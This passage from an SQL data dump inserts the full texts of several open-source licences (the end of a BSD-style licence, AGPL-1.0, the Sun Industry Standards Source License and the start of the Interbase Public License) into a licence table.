reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgement:\n\n This product includes software developed by the organization .\n\n4. Neither the name of the copyright holder nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY COPYRIGHT HOLDER \"AS IS\" AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT\nHOLDER BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\nOR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(192,'AGPL-1.0','AFFERO GENERAL PUBLIC LICENSE\nVersion 1, March 2002 Copyright © 2002 Affero Inc.\n510 Third Street - Suite 225, San Francisco, CA 94107, USA\nThis license is a modified version of the GNU General Public License copyright (C) 1989, 1991 Free Software Foundation, Inc. made with their permission. Section 2(d) has been added to cover use of software over a computer network.\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\nPreamble\nThe licenses for most software are designed to take away your freedom to share and change it. By contrast, the Affero General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This Public License applies to most of Affero\'s software and to any other program whose authors commit to using it. (Some other Affero software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too.\nWhen we speak of free software, we are referring to freedom, not price. This General Public License is designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things.\nTo protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it.\nFor example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights.\nWe protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software.\nAlso, for each author\'s protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors\' reputations.\nFinally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone\'s free use or not licensed at all.\nThe precise terms and conditions for copying, distribution and modification follow.\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this Affero General Public License. The \"Program\", below, refers to any such program or work, and a \"work based on the Program\" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term \"modification\".) Each licensee is addressed as \"you\".\n Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does.\n 1. You may copy and distribute verbatim copies of the Program\'s source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program.\n You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee.\n 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions:\n a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change.\n b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License.\n c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.)\n d) If the Program as you received it is intended to interact with users through a computer network and if, in the version you received, any user interacting with the Program was given the opportunity to request transmission to that user of the Program\'s complete source code, you must not remove that facility from your modified version of the Program or work based on the Program, and must offer an equivalent opportunity for all users interacting with your Program through a computer network to request immediate transmission by HTTP of the complete source code of your modified version or other derivative work.\n These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it.\n Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program.\n In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License.\n 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following:\n a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or,\n b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or,\n c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.)\n The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.\n If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code.\n 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance.\n 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it.\n 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients\' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License.\n 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program.\n If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances.\n It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice.\n This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License.\n 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License.\n 9. Affero Inc. may publish revised and/or new versions of the Affero General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.\n Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and \"any later version\", you have the option of following the terms and conditions either of that version or of any later version published by Affero, Inc. If the Program does not specify a version number of this License, you may choose any version ever published by Affero, Inc.\n You may also choose to redistribute modified versions of this program under any version of the Free Software Foundation\'s GNU General Public License version 3 or higher, so long as that version of the GNU GPL includes terms and conditions substantially equivalent to those of this license.\n 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by Affero, Inc., write to us; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally.\n NO WARRANTY\n 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(193,'SISSL','Sun Industry Standards Source License - Version 1.1\n\n 1.0 DEFINITIONS\n\n1.1 \"Commercial Use\" means distribution or otherwise making the Original Code\navailable to a third party.\n\n1.2 \"Contributor Version\" means the combination of the Original Code, and\nthe Modifications made by that particular Contributor.\n\n1.3 \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.4 \"Executable\" means Original Code in any form other than Source Code.\n\n1.5 \"Initial Developer\" means the individual or entity identified as the Initial\nDeveloper in the Source Code notice required by Exhibit A.\n\n1.6 \"Larger Work\" means a work which combines Original Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.7 \"License\" means this document.\n\n1.8 \"Licensable\" means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n1.9 \"Modifications\" means any addition to or deletion from the substance or\nstructure of either the Original Code or any previous Modifications. A Modification\nis:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10 \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code.\n\n1.11 \"Patent Claims\" means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.12 \"Source Code\" means the preferred form of the Original Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, or scripts used to control compilation and installation\nof an Executable.\n\n 1.13 \"Standards\" means the standards identified in Exhibit B.\n\n1.14 \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\'\' includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\'\' means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2.0 SOURCE CODE LICENSE\n\n2.1 The Initial Developer Grant The Initial Developer hereby grants You a\nworld-wide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices,\nincluding but not limited to Modifications.\n\n 3.0 DISTRIBUTION OBLIGATIONS\n\n3.1 Application of License. The Source Code version of Original Code may be\ndistributed only under the terms of this License or a future version of this\nLicense released under Section 6.1, and You must include a copy of this License\nwith every copy of the Source Code You distribute. You may not offer or impose\nany terms on any Source Code version that alters or restricts the applicable\nversion of this License or the recipients\' rights hereunder. Your license\nfor shipment of the Contributor Version is conditioned upon Your full compliance\nwith this Section. The Modifications which You create must comply with all\nrequirements set out by the Standards body in effect one hundred twenty (120)\ndays before You ship the Contributor Version. In the event that the Modifications\ndo not meet such requirements, You agree to publish either (i) any deviation\nfrom the Standards protocol resulting from implementation of Your Modifications\nand a reference implementation of Your Modifications or (ii) Your Modifications\nin Source Code form, and to make any such deviation and reference implementation\nor Modifications available to all third parties under the same terms as this\nlicense on a royalty free basis within thirty (30) days of Your first customer\nshipment of Your Modifications.\n\n3.2 Required Notices. You must duplicate the notice in Exhibit A in each file\nof the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd Your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Initial Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Your version of the\nCode. However, You may do so only on Your own behalf, and not on behalf of\nthe Initial Developer. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer for any liability incurred\nby the Initial Developer as a result of warranty, support, indemnity or liability\nterms You offer.\n\n3.3 Distribution of Executable Versions. You may distribute Original Code\nin Executable and Source form only if the requirements of Sections 3.1 and\n3.2 have been met for that Original Code, and if You include a notice stating\nthat the Source Code version of the Original Code is available under the terms\nof this License. The notice must be conspicuously included in any notice in\nan Executable or Source versions, related documentation or collateral in which\nYou describe recipients\' rights relating to the Original Code. You may distribute\nthe Executable and Source versions of Your version of the Code or ownership\nrights under a license of Your choice, which may contain terms different from\nthis License, provided that You are in compliance with the terms of this License.\nIf You distribute the Executable and Source versions under a different license\nYou must make it absolutely clear that any terms which differ from this License\nare offered by You alone, not by the Initial Developer. You hereby agree to\nindemnify the Initial Developer for any liability incurred by the Initial\nDeveloper as a result of any such terms You offer.\n\n3.4 Larger Works. You may create a Larger Work by combining Original Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Original Code.\n\n 4.0 INABILITY TO COMPLY DUE TO STATUTE OR REGULATION\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Original Code due to statute, judicial\norder, or regulation then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.2 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5.0 APPLICATION OF THIS LICENSE\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Modifications as set out in Section 3.1.\n\n 6.0 VERSIONS OF THE LICENSE\n\n6.1 New Versions. Sun may publish revised and/or new versions of the License\nfrom time to time. Each version will be given a distinguishing version number.\n\n6.2 Effect of New Versions. Once Original Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Original Code under\nthe terms of any subsequent version of the License published by Sun. No one\nother than Sun has the right to modify the terms applicable to Original Code.\n\n 7.0 DISCLAIMER OF WARRANTY\n\nORIGINAL CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES THAT THE ORIGINAL CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR\nA PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY\nAND PERFORMANCE OF THE ORIGINAL CODE IS WITH YOU. SHOULD ANY ORIGINAL CODE\nPROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER) ASSUME THE\nCOST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF\nWARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY ORIGINAL\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8.0 TERMINATION\n\n8.1 This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Original Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2 In the event of termination under Section 8.1 above, all end user license\nagreements (excluding distributors and resellers) which have been validly\ngranted by You or any distributor hereunder prior to termination shall survive\ntermination.\n\n 9.0 LIMIT OF LIABILITY\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF ORIGINAL CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10.0 U.S. GOVERNMENT END USERS\n\nU.S. Government: If this Software is being acquired by or on behalf of the\nU.S. Government or by a U.S. Government prime contractor or subcontractor\n(at any tier), then the Government\'s rights in the Software and accompanying\ndocumentation shall be only as set forth in this license; this is in accordance\nwith 48 C.F.R. 227.7201 through 227.7202-4 (for Department of Defense (DoD)\nacquisitions) and with 48 C.F.R. 2.101 and 12.212 (for non-DoD acquisitions).\n\n 11.0 MISCELLANEOUS\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License. EXHIBIT A -\nSun Standards License\n\n\" The contents of this file are subject to the Sun Standards License Version\n1.1 (the \"License\"); You may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at _______________________________\n.\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either\n\nexpress or implied. See the License for the specific language governing rights\nand limitations under the License.\n\nThe Original Code is ______________________________________ .\n\nThe Initial Developer of the Original Code is: Sun Microsystems, Inc. .\n\nPortions created by: _______________________________________\n\nare Copyright (C): _______________________________________\n\nAll Rights Reserved.\n\nContributor(s): _______________________________________\n\nEXHIBIT B - Standards\n\nThe Standard is defined as the following:\n\nOpenOffice.org XML File Format Specification, located at http://xml.openoffice.org\n\nOpenOffice.org Application Programming Interface Specification, located at\n\nhttp://api.openoffice.org\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(194,'Interbase-1.0','INTERBASE PUBLIC LICENSE\n\nVersion 1.0\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \'\'Contributor\'\' means each entity that creates or contributes to the\ncreation of Modifications.\n\n1.2. \'\'Contributor Version\'\' means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \'\'Covered Code\'\' means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \'\'Electronic Distribution Mechanism\'\' means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n1.5. \'\'Executable\'\' means Covered Code in any form other than Source Code.\n\n1.6. \'\'Initial Developer\'\' means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \'\'Larger Work\'\' means a work which combines Covered Code or portions\nthereof with code not governed by the terms of this License.\n\n 1.8. \'\'License\'\' means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \'\'Modifications\'\' means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \'\'Original Code\'\' means Source Code of computer software code which\nis described in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \'\'Source Code\'\' means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\'\' (or \"Your\") means an individual or a legal entity exercising\nrights under, and complying with all of the terms of, this License or a future\nversion of this License issued under Section 6.1. For legal entities, \"You\'\'\nincludes any entity which controls, is controlled by, or is under common control\nwith You. For purposes of this definition, \"control\'\' means (a) the power,\ndirect or indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n 2.1. The Initial Developer Grant.\n\nThe Initial Developer hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n 2.2. Contributor Grant.\n\nSubject to third party intellectual property claims, each Contributor hereby\ngrants You a world-wide, royalty-free, non-exclusive license\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n 3.1. Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2. Availability of Source Code.\n\nAny Modification which You create or to which You contribute must be made\navailable in Source Code form under the terms of this License either on the\nsame media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n 3.3. Description of Modifications.\n\nYou must cause all Covered Code to which You contribute to contain a file\ndocumenting the changes You made to create that Covered Code and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Code provided by the Initial\nDeveloper and including the name of the Initial Developer in (a) the Source\nCode, and (b) in any notice in an Executable version or related documentation\nin which You describe the origin or ownership of the Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims.\n\nIf Contributor has knowledge that a license under a third party\'s intellectual\nproperty rights is required to exercise the rights granted by such Contributor\nunder Sections 2.1 or 2.2, Contributor must include a text file with the Source\nCode distribution titled \"LEGAL\'\' which describes the claim and the party\nmaking the claim in sufficient detail that a recipient will know whom to contact.\nIf Contributor obtains such knowledge after the Modification is made available\nas described in Section 3.2, Contributor shall promptly modify the LEGAL file\nin all copies Contributor makes available thereafter and shall take other\nsteps (such as notifying appropriate mailing lists or newsgroups) reasonably\ncalculated to inform those who received the Covered Code that new knowledge\nhas been obtained.\n\n (b) Contributor APIs.\n\nIf Contributor\'s Modifications include an application programming interface\nand Contributor has knowledge of patent licenses which are reasonably necessary\nto implement that API, Contributor must also include this information in the\nLEGAL file.\n\n (c) Representations.\n\nContributor represents that, except as disclosed pursuant to Section 3.4(a)\nabove, Contributor believes that Contributor\'s Modifications are Contributor\'s\noriginal creation(s) and/or Contributor has sufficient rights to grant the\nrights conveyed by this License.\n\n 